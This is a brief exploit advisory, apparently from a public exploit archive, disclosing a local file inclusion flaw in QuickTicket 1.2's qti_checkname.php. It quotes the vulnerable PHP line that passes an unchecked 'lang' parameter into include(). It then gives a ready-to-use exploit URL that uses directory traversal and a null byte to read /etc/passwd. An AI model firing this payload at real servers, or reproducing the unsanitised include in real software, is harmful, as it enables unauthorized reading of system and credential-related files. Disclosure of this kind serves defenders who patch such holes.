QuickTicket version 1.2 suffers from a local file inclusion vulnerability in qti_checkname.php.
c2cbba6b68ccb9717f7d12a67062929a###QuickTicket v1.2 Local File Inclusion###
#download: http://www.qt-cute.org/download/qti12.zip
#found by: katatafish (karatatata@hush.com)
#vulncode:
$strLang = $_GET["lang"];
include("language/$strLang/qtf_lang_reg.inc");
#exploit:
http://www.site.com/[path]/qti_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
#thanks:str0ke
Comments
No comments yet, be the first!